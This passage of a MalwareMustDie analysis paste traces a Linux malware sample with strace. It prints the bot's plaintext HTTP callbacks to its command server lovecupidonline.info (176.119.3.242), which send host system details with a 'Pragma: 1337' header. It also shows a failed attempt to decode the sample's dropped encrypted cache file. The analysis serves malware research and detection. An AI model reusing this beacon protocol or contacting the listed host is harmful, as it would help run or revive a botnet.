  608. [pid 18153] open("/etc/nsswitch.conf", O_RDONLY) = 4
  609. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
  610. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  611. [pid 18153] read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
  612. [pid 18153] read(4, "", 4096)           = 0
  613. [pid 18153] close(4)                    = 0
  614. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  615. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  616. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  617. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  618. [pid 18153] close(4)                    = 0
  619. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  620. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
  621. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200!\0\0\0\0\0\0"..., 832) = 832
  622. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=47616, ...}) = 0
  623. [pid 18153] mmap(NULL, 2143624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d4acd000
  624. [pid 18153] mprotect(0x7f57d4ad8000, 2093056, PROT_NONE) = 0
  625. [pid 18153] mmap(0x7f57d4cd7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0xa000) = 0x7f57d4cd7000
  626. [pid 18153] close(4)                    = 0
  627. [pid 18153] mprotect(0x7f57d4cd7000, 4096, PROT_READ) = 0
  628. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  629. [pid 18153] open("/etc/host.conf", O_RDONLY) = 4
  630. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
  631. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  632. [pid 18153] read(4, "multi on\n", 4096) = 9
  633. [pid 18153] read(4, "", 4096)           = 0
  634. [pid 18153] close(4)                    = 0
  635. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  636. [pid 18153] futex(0x7f57d90a0324, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  637. [pid 18153] open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
  638. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=495, ...}) = 0
  639. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  640. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 495
  641. [pid 18153] read(4, "", 4096)           = 0
  642. [pid 18153] close(4)                    = 0
  643. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  644. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  645. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  646. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  647. [pid 18153] close(4)                    = 0
  648. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  649. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
  650. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"..., 832) = 832
  651. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=22928, ...}) = 0
  652. [pid 18153] mmap(NULL, 2117888, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d48c7000
  653. [pid 18153] mprotect(0x7f57d48cc000, 2093056, PROT_NONE) = 0
  654. [pid 18153] mmap(0x7f57d4acb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x4000) = 0x7f57d4acb000
  655. [pid 18153] close(4)                    = 0
  656. [pid 18153] mprotect(0x7f57d4acb000, 4096, PROT_READ) = 0
  657. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  658. [pid 18153] stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  659. [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
  660. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  661. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  662. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
  663. [pid 18153] read(4, "", 4096)           = 0
  664. [pid 18153] close(4)                    = 0
  665. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  666. [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
  667. [pid 18153] socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
  668. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
  669. [pid 18153] poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
  670. [pid 18153] sendto(4, "\313:\1\0\0\1\0\0\0\0\0\0\17lovecupidonline\4inf"..., 38, MSG_NOSIGNAL, NULL, 0) = 38
  671. [pid 18153] poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
  672. [pid 18153] ioctl(4, FIONREAD, [54])    = 0
  673. [pid 18153] recvfrom(4, "\313:\201\200\0\1\0\1\0\0\0\0\17lovecupidonline\4inf"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 54
  674. [pid 18153] close(4)                    = 0
  675. [pid 18153] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
  676. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("176.119.3.242")}, 16) = 0
  677. [pid 18153] write(4, "POST /cupids_banner/cupids.php H"..., 196) = 196
  678.  
  679.  
   680. // CALLBACKS GENERATED (plaintext HTTP/1.0 POSTs to the CNC over TCP/80 — the socket/connect/write to 176.119.3.242:80 at lines 675-677 above; the Host "lovecupidonline.info" plus the non-standard "Pragma: 1337" header make a usable network IOC):
  681.  
  682. // CNC calls -1-
  683.  
  684. POST /cupids_banner/cupids.php HTTP/1.0
  685. Host: lovecupidonline.info
  686. Pragma: 1337
  687. Content-Length: 91
  688.  
  689. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  690.  
  691. // response:
  692. HTTP/1.1 200 OK
  693. Date: Tue, 05 Aug 2014 08:30:05 GMT
  694. Server: Apache/2.2.15 (CentOS)
  695. X-Powered-By: PHP/5.5.15
  696. Content-Length: 13
  697. Connection: close
  698. Content-Type: text/html; charset=UTF-8
  699.  
  700. mysql_connect^Y<96><E0>S<E5><EC>^@^@B^@^@^@B^@^@^@^@^Y<DB><F2><BE>)^@&<88>v%<8C>^H^@E<CC>^@4m^Q@^@9^F<AC>
  701. <B0>w^C<F2>N.%E^@P<8A><B8><86>9<DE>^Y<D0>P<EA><BE><80>^Q^@zF<81>^@^@^A^A^H[...]
  702.  
  703.  
  704. // CNC Calls -2-
  705.  
  706. POST /cupids_banner/cupids.php HTTP/1.0
  707. Host: lovecupidonline.info
  708. Pragma: 1337
  709. Content-Length: 91
  710.  
  711. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  712.  
  713. //response
  714.  
  715. HTTP/1.1 200 OK
  716. Date: Tue, 05 Aug 2014 08:31:05 GMT
  717. Server: Apache/2.2.15 (CentOS)
  718. X-Powered-By: PHP/5.5.15
  719. Content-Length: 6
  720. Connection: close
  721. Content-Type: text/html; charset=UTF-8
  722.  
  723. R,200
  724.  
  725.  
  726. // CNC Calls -3-
  727.  
  728. POST /cupids_banner/cupids.php HTTP/1.0
  729. Host: lovecupidonline.info
  730. Pragma: 1337
  731. Content-Length: 12
  732.  
  733. P,0,0,0,0,2
  734.  
  735.  
  736. // response:
  737.  
  738. HTTP/1.1 200 OK
  739. Date: Tue, 05 Aug 2014 08:32:06 GMT
  740. Server: Apache/2.2.15 (CentOS)
  741. X-Powered-By: PHP/5.5.15
  742. Content-Length: 2
  743. Connection: close
  744. Content-Type: text/html; charset=UTF-8
  745.  
  746. C
  747.  
  748. // CNC calls -4-
  749.  
  750. POST /cupids_banner/cupids.php HTTP/1.0
  751. Host: lovecupidonline.info
  752. Pragma: 1337
  753. Content-Length: 12
  754.  
  755. P,0,0,0,0,3
  756.  
  757. // response:
  758.  
  759. HTTP/1.1 200 OK
  760. Date: Tue, 05 Aug 2014 08:24:55 GMT
  761. Server: Apache/2.2.15 (CentOS)
  762. X-Powered-By: PHP/5.5.15
  763. Content-Length: 6
  764. Connection: close
  765. Content-Type: text/html; charset=UTF-8
  766.  
  767. R,200
  768.  
   769. // compile a reader for the dropped .cache file (the 12 MiB file created, ftruncate'd and mmap'd MAP_SHARED by pid 18141 at lines 546-548 above;
   770. // presumably an encrypted FAT image, hence the fat_filelib-based SD0 reader — to be confirmed)
   771. // source1: https://github.com/freeoks/SD0_reader
   772. // source2: http://ultra-embedded.com/fat_filelib
  772.  
  773. // put all in a place:
  774. -rw-r--r-- 1 rik rik 4980 Nov 30  2013 fat_access.h
  775. -rw-r--r-- 1 rik rik  526 Nov 30  2013 fat_cache.h
  776. -rw-r--r-- 1 rik rik 4983 Nov 30  2013 fat_defs.h
  777. -rw-r--r-- 1 rik rik 4698 Nov 30  2013 fat_filelib.h
  778. -rw-r--r-- 1 rik rik  545 Nov 30  2013 fat_format.h
  779. -rw-r--r-- 1 rik rik 4646 Nov 30  2013 fat_list.h
  780. -rw-r--r-- 1 rik rik 3330 Nov 30  2013 fat_misc.h
  781. -rw-r--r-- 1 rik rik 2409 Nov 30  2013 fat_opts.h
  782. -rw-r--r-- 1 rik rik  783 Nov 30  2013 fat_string.h
  783. -rw-r--r-- 1 rik rik  922 Nov 30  2013 fat_table.h
  784. -rw-r--r-- 1 rik rik 1998 Nov 30  2013 fat_types.h
  785. -rw-r--r-- 1 rik rik  599 Nov 30  2013 fat_write.h
  786.  
   787. // edit the Makefile to drop the "/lib/" prefix from the source paths (all headers were copied into one directory above),
   788. // then compile (the implicit-declaration warnings are harmless here, a missing #include <string.h> in read_sd0.c):
  789.  
  790.  $ make
  791. gcc -c -I./lib read_sd0.c -o read_sd0.o
  792. read_sd0.c: In function 'decrypt_blocks':
  793. read_sd0.c:51:9: warning: incompatible implicit declaration of built-in function 'memcpy' [enabled by default]
  794. read_sd0.c: In function 'read_files_from_directory':
  795. read_sd0.c:130:47: warning: incompatible implicit declaration of built-in function 'strlen' [enabled by default]
  796. read_sd0.c:131:17: warning: incompatible implicit declaration of built-in function 'strcpy' [enabled by default]
  797. read_sd0.c:132:17: warning: incompatible implicit declaration of built-in function 'strcat' [enabled by default]
  798. gcc -c -I./lib fat_access.c -o fat_access.o
  799. gcc -c -I./lib fat_cache.c -o fat_cache.o
  800. gcc -c -I./lib fat_filelib.c -o fat_filelib.o
  801. gcc -c -I./lib fat_format.c -o fat_format.o
  802. gcc -c -I./lib fat_misc.c -o fat_misc.o
  803. gcc -c -I./lib fat_string.c -o fat_string.o
  804. gcc -c -I./lib fat_table.c -o fat_table.o
  805. gcc -c -I./lib fat_write.c -o fat_write.o
  806. gcc -s read_sd0.o fat_access.o fat_cache.o fat_filelib.o fat_format.o fat_misc.o fat_string.o fat_table.o fat_write.o -o read_sd0
  807.  
   808. // does not work :-( — no output at all: the strace below shows the reader open()s and mmap()s .cache read-only and then exit_group(0)s without a single read or write, i.e. it does not recognise the image (likely a key/layout the SD0 reader does not expect — unconfirmed)..
  809.  
  810. ./read_sd0  -f .cache -d ./test
  811. execve("./read_sd0", ["./read_sd0", "-f", ".cache", "-d", "./test"], [/* 20 vars */]) = 0
  812. brk(0)                                  = 0x1479000
  813. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  814. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf716000
  815. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  816. open("/etc/ld.so.cache", O_RDONLY)      = 3
  817. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  818. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fdfcf708000
  819. close(3)                                = 0
  820. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  821. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  822. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  823. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  824. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fdfcf16e000
  825. mprotect(0x7fdfcf2f0000, 2093056, PROT_NONE) = 0
  826. mmap(0x7fdfcf4ef000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7fdfcf4ef000
  827. mmap(0x7fdfcf4f4000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf4f4000
  828. close(3)                                = 0
  829. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf707000
  830. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf706000
  831. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf705000
  832. arch_prctl(ARCH_SET_FS, 0x7fdfcf706700) = 0
  833. mprotect(0x7fdfcf4ef000, 16384, PROT_READ) = 0
  834. mprotect(0x7fdfcf718000, 4096, PROT_READ) = 0
  835. munmap(0x7fdfcf708000, 56122)           = 0
  836. open(".cache", O_RDONLY)                = 3
  837. lseek(3, 0, SEEK_END)                   = 12582912
  838. mmap(NULL, 12582912, PROT_READ, MAP_SHARED, 3, 0) = 0x7fdfce56e000
  839. exit_group(0)                           = ?
  840.  
  841.  
  842. ----
  843. #MalwareMustdie | @unixfreaxjp